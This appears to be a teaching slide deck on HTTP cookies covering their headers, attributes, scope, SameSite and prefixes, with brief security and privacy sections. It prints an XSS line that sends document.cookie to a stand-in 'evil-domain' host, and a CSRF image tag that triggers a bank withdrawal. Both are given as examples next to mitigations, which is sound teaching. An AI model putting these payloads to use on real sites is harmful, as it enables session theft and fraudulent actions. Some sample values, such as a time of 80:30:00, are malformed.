Overview of Cookies in HTTP - Miran al Mehrab

1. HTTP Cookie
A Quick Overview of Cookie in HTTP

2. What is a Cookie?
Cookie is a small piece of data that is sent from the website and is stored on the
user computer. Then the stored cookie is sent to the same website with every
request.

3. Cookies are designed to be a reliable mechanism to remember stateful
information as HTTP is stateless.
Cookies are used mainly for three purposes:
● Session management
● Personalization
● Tracking
Purpose of Cookie

4. Figure: Client request
Figure: Server response
HTTP/2.0 200 OK
Content-type: text/html
Set-Cookie: tasty_cookie=strawberry
[page content]
GET /sample_page.html HTTP/2.0
HOST: www.example.org
Cookie: tasty_cookie=strawberry
How to set Cookie?

5. Set-Cookie Header
Figure: Set-Cookie syntax
Set-Cookie : <Cookie-name>=<Cookie-Value>
Set-Cookie : <Cookie-name>=<Cookie-Value>; Expires=<date>
Set-Cookie : <Cookie-name>=<Cookie-Value>; Max-age=<non-zero Length>
Set-Cookie : <Cookie-name>=<Cookie-Value>; Domain=<domain-value>
Set-Cookie : <Cookie-name>=<Cookie-Value>; Path=<path-value>
Set-Cookie : <Cookie-name>=<Cookie-Value>; Secure
Set-Cookie : <Cookie-name>=<Cookie-Value>; HttpOnly
Set-Cookie : <Cookie-name>=<Cookie-Value>; SameSite= Strict
Set-Cookie : <Cookie-name>=<Cookie-Value>; SameSite= Lax
Set-Cookie : <Cookie-name>=<Cookie-Value>; SameSite= None
Set-Cookie : <Cookie-name>=<Cookie-Value>; Domain=<domain-value>;Secure

6. Cookie Header
The Cookie HTTP request header contains stored HTTP cookies previously sent
by the server with Set-Cookie header. Cookie header is optional and may be
omitted, for example, if the browser’s privacy block cookies.
Cookie: <Cookie-list>
Cookie: name=value
Cookie: name=value; name2=value2; name3=value3
Figure: Cookie header in HTTP request

7. Classification of Cookies
There are two types of cookies in terms of persistence, such as -
● Session cookie/ Non-persistent cookie
● Permanent cookie/ Persistent cookie
Example: Set-Cookie: theme: light; language: english
Example: Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2021 07:28:00 GMT

8. Classification of Cookies (Continued)
Cookies can be classified according to which protocol is used, HTTP or HTTPS.
Like-
● Secure Cookie
● HttpOnly cookie
Example: Set-Cookie: id=a3fwa; Expires= Wed, 05 Feb 2020 80:30:00 GMT; Secure; HttpOnly

9. Scope of cookies
The Domain and Path directives define the scope of cookies which tells the user
client to send cookies to specific URLs. Like -
● Domain: Domain specifies allowed hosts to receive cookies.
● Path: Path indicates a URL path that must exist in the requested URL in order to
send cookie header.
domain=mozilla.org then developer.mozilla.org is included.
/docs
/docs/web/
/docs/web/HTTP

10. Cross site cookie sharing
SameSite cookies let servers require that cookie shouldn’t be sent with cross-site
requests. SameSite can have one of the following three values :-
● None
● Strict
● Lax
Example: Set-Cookie: key=value; Samesite=Strict

11. Cookie prefixes
Cookies can be overwritten by a man-in-the-middle attacker,even when using
HTTPS. So special cookie prefixes are used to make them more secure.
1. __Secure - prefix makes a cookie accessible from HTTPS sites only.
2. __Host - prefixed cookie is only accessible by the same domain it’s set on.So
a subdomain can no longer overwrite the cookie value.

12. JavaScript access using Document.cookie
New cookies can be created via JavaScript using Document.cookie property, and
if the HttpOnly flag is not set,existing cookies can be accessed from the
JavaScript as well.
document.cookie = “yummy_cookie = choco”;
document.cookie = “tasty_cookie = strawberry”:
console.log(document.cookie);

13. Security issues
Session Hijacking and XSS:
If cookies are used to identify users and their authenticated session, then stealing
the cookie can be used to impersonate the user. For example -
Prevention: HttpOnly cookie attribute can mitigate this attack.
new Image()).src = "http://www.evil-domain.com/steal-cookie?cookie=" +
document.cookie;

14. Security issues (continued)
Cross-site request forgery(CSRF): This attack forces an user to execute unwanted
actions on a web application in which they’re currently authenticated. Like -
transferring funds, changing email address etc.
Now, this transaction will be executed as soon as the HTML page is loaded.
<img src="https://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

15. Security issues (continued)
Prevention: several steps can be taken to mitigate the security issue. Such as-
● GET endpoints should be idempotent
● Use of CSRF token
● Short lifetime of session cookie
● CSRF token and SameSite token should be deployed.

16. Tracking and privacy
Cookies are widely used by organizations to track user behavior and advertising.
There are some headers that can be used to protect user privacy. Such as -
● Do-Not-Track(DNT) - request header indicates the user’s tracking preference.
● EU cookie directive: The user must give consent to store or retrieve any
information from a computer,mobile phone or other devices.
● Zombie cookies - This type of cookie is recreated after deletion and resides
outside the web browser’s dedicated cookie storage.

17. Drawbacks of Cookies
Cookies have some disadvantages which makes it inefficient to represent state,
like -
● Inaccurate identification
● Inconsistent state on client and server

18. Alternative of Cookie
There are alternatives of cookies. Some of them are listed below -
● JWT
● HTTP Authentication
● IP address
etc.

19. References
● https://www.sjoerdlangkemper.nl/2017/02/09/cookie-prefixes/
● https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
● https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie
● https://en.wikipedia.org/wiki/Zombie_cookie
● https://en.wikipedia.org/wiki/HTTP_cookie

20. Thank You!